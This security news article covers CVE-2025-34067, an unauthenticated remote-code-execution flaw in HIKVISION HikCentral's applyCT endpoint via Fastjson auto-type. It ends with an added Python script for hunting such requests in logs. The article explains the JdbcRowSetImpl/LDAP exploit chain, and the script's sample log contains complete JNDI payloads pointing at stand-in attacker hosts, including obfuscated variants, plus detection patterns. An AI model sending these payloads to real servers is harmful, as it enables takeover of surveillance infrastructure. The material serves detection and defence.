Critical HIKVISION ApplyCT Vulnerability Exposes Devices to Code Execution Attacks
A critical security vulnerability has been discovered in HIKVISION's applyCT component, part of the HikCentral Integrated Security Management Platform, that allows unauthenticated attackers to execute arbitrary code on the server remotely.
Assigned CVE-2025-34067 with the maximum CVSS score of 10.0, the flaw stems from the platform's use of a vulnerable version of the Fastjson library. Because HikCentral is the management layer for the cameras and other security devices it controls, a compromised server puts every device behind it at risk, potentially exposing a very large installed base of surveillance systems worldwide.
Key Takeaways
1. CVE-2025-34067 (CVSS 10.0) in HIKVISION applyCT allows unauthenticated remote code execution.
2. Exploits the Fastjson library via malicious JSON sent to the /bic/ssoService/v1/applyCT endpoint, coercing the server into connecting to an attacker-controlled LDAP server.
3. Affects HikCentral surveillance platforms across government, commercial, and industrial sectors globally.
4. Assess deployments immediately, restrict network access to the endpoint, and contact HIKVISION for patches; the flaw is reported as actively exploited.
Critical Fastjson Deserialization Flaw
The vulnerability exploits the /bic/ssoService/v1/applyCT endpoint through malicious JSON payloads processed by the Fastjson library.
Attackers can craft specific JSON requests that trigger Fastjson’s auto-type feature, enabling the loading of arbitrary Java classes.
The attack abuses the JDK's JdbcRowSetImpl class: Fastjson instantiates it and calls its setters from the JSON keys, and once dataSourceName holds an attacker-supplied JNDI name and autoCommit is set, the class performs a JNDI lookup of that name, so the HikCentral server opens a connection to an untrusted LDAP server instead of a configured data source.
The exploit is a single POST request with Content-Type: application/json to the vulnerable endpoint. By pointing the dataSourceName property (the payload's datasource parameter) at a malicious LDAP server, the attacker has that server answer the lookup with a reference to an attacker-controlled Java class or serialized object, which the JVM loads, giving remote code execution on the underlying system.
This represents a classic case of CWE-502 Deserialization of Untrusted Data combined with CWE-917 Expression Language Injection, where insufficient input validation allows unauthorized class loading and code execution.
The vulnerability affects the HikCentral platform, formerly known as the “Integrated Security Management Platform,” which serves as a comprehensive security management solution widely deployed across government, commercial, and industrial sectors.
The platform’s extensive adoption makes this vulnerability particularly concerning, as it provides centralized control over multiple security devices and surveillance systems.
Potential consequences include unauthorized access to sensitive surveillance data, manipulation of security systems, and the possibility of lateral movement within network infrastructure.
Organizations using affected HIKVISION applyCT systems face risks of data breaches, service disruptions, and potential compromise of their entire security infrastructure.
Because exploitation requires no valid credentials, the barrier to entry for malicious actors is low.
The vulnerability has been tagged as a known exploited vulnerability, indicating that exploitation has been observed in the wild.
| Risk Factors | Details |
| --- | --- |
| Affected Products | HIKVISION HikCentral (formerly "Integrated Security Management Platform"); applyCT component; versions using the vulnerable Fastjson library |
| Impact | Remote Code Execution (RCE) |
| Exploit Prerequisites | Network access to the /bic/ssoService/v1/applyCT endpoint; ability to send HTTP POST requests; no authentication required; an attacker-controlled LDAP server reachable from the target |
| CVSS Score | 10.0 (Critical) |
Mitigations
Organizations should immediately assess their HIKVISION applyCT deployments and implement network segmentation to limit exposure.
Monitoring for unusual network traffic to the /bic/ssoService/v1/applyCT endpoint can help detect attempts at exploitation.
While specific patches have not been detailed in current advisories, users should contact HIKVISION support for immediate remediation guidance and consider temporarily restricting access to the vulnerable endpoint until patches are available.
Security teams should also monitor for LDAP connection attempts originating from their HIKVISION systems and consider deploying network-based intrusion detection to identify exploitation attempts targeting this vulnerability. Because the exploit chain depends on the HikCentral server making an outbound LDAP (or RMI) connection to the attacker, egress filtering that denies such connections from the server breaks the chain even where the malicious request itself is not blocked.
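As an added example (not code from the article, HIKVISION or the advisory), the following Python script shows both what a Fastjson auto-type payload of the kind described above looks like and one way to hunt for it in request logs: it parses a constructed log format, decodes JSON bodies sent to /bic/ssoService/v1/applyCT, and flags @type keys, the JdbcRowSetImpl gadget, and ldap://, rmi:// or iiop:// URLs in string values, including when they are nested or the key is hidden behind a \u0040 escape. The log format, the sample lines, the IP addresses and the Exploit class names are constructed for the example; HikCentral's real log format is not given on the page.

```python
"""Hunt for Fastjson auto-type / JNDI payloads aimed at the HikCentral applyCT endpoint.
Log format is constructed for this example (not HIKVISION's real format):
    <timestamp> <client-ip> <method> <path> <content-type> <raw body>
"""
import json
import re
from dataclasses import dataclass

TARGET_PATH = "/bic/ssoService/v1/applyCT"
AUTOTYPE_KEY = "@type"  # Fastjson's class-selection key (JSON.DEFAULT_TYPE_KEY)
# Publicly known Fastjson JNDI gadgets; JdbcRowSetImpl is the one the advisory names.
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl",
                  "org.apache.xbean.propertyeditor.JndiConverter"}
# URL schemes a JNDI lookup will follow out to an attacker-controlled server.
JNDI_URL = re.compile(r"\b(ldaps?|rmi|iiop)://", re.IGNORECASE)
# Raw-body fallback: the key may be written as \u0040type to dodge naive filters.
RAW_AUTOTYPE = re.compile(r"""["'](?:@|\\u0040)type["']""", re.IGNORECASE)


@dataclass
class Finding:
    timestamp: str
    client: str
    reasons: list


def _walk(node, path=""):
    """Yield (json_path, key, value) at every depth: Fastjson honours @type in nested objects too."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}" if path else key
            yield here, key, value
            yield from _walk(value, here)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")


def inspect_body(body: str) -> list:
    """Return the reasons a request body looks like an auto-type / JNDI payload."""
    reasons = []
    try:
        doc = json.loads(body)
    except ValueError:
        # Fastjson accepts input strict JSON rejects (e.g. single-quoted strings),
        # so an unparseable body is not benign: scan the raw text instead.
        if RAW_AUTOTYPE.search(body):
            reasons.append("@type key in non-strict JSON body")
        if JNDI_URL.search(body):
            reasons.append("JNDI URL in non-strict JSON body")
        return reasons
    for jpath, key, value in _walk(doc):
        if key == AUTOTYPE_KEY:
            cls = str(value)
            if cls in GADGET_CLASSES:
                reasons.append(f"known JNDI gadget class {cls} at {jpath}")
            else:
                reasons.append(f"auto-type key at {jpath} -> {cls}")
        elif isinstance(value, str) and JNDI_URL.search(value):
            reasons.append(f"JNDI URL in {jpath}: {value}")
    return reasons


def scan_log(lines) -> list:
    """Return one Finding per suspicious POST to the applyCT endpoint."""
    findings = []
    for line in lines:
        parts = line.strip().split(" ", 5)
        if len(parts) < 6:
            continue
        ts, client, method, path, _ctype, body = parts
        if method != "POST" or path != TARGET_PATH:
            continue
        reasons = inspect_body(body)
        if reasons:
            findings.append(Finding(ts, client, reasons))
    return findings


# Constructed sample log: documentation IP ranges, made-up class names.
SAMPLE_LOG = [
    # ordinary request with no auto-type key
    '2025-07-02T10:15:01Z 10.0.0.5 POST /bic/ssoService/v1/applyCT application/json '
    '{"userName":"alice","ticket":"abc123"}',
    # the classic public JdbcRowSetImpl chain: dataSourceName plus autoCommit
    '2025-07-02T10:15:02Z 203.0.113.7 POST /bic/ssoService/v1/applyCT application/json '
    '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://203.0.113.7:1389/Exploit","autoCommit":true}',
    # same gadget nested one level down, key hidden behind a unicode escape
    '2025-07-02T10:15:03Z 203.0.113.7 POST /bic/ssoService/v1/applyCT application/json '
    '{"params":{"\\u0040type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://203.0.113.7:1099/Exploit","autoCommit":true}}',
    # different path: outside this detector's scope
    '2025-07-02T10:15:04Z 203.0.113.7 POST /bic/login application/json '
    '{"@type":"com.sun.rowset.JdbcRowSetImpl"}',
    # single-quoted body that Fastjson tolerates but strict JSON rejects
    "2025-07-02T10:15:05Z 198.51.100.9 POST /bic/ssoService/v1/applyCT application/json "
    "{'@type':'com.sun.rowset.JdbcRowSetImpl','dataSourceName':'ldap://198.51.100.9/x'}",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f.timestamp, f.client)
        for reason in f.reasons:
            print("   ", reason)
```

Running the script reports three of the five constructed lines (the nested and single-quoted variants included) and ignores the request to a different path. The detector only sees request bodies; it should be paired with the outbound-LDAP monitoring and egress filtering described above, which catch the second half of the chain regardless of how the payload was encoded.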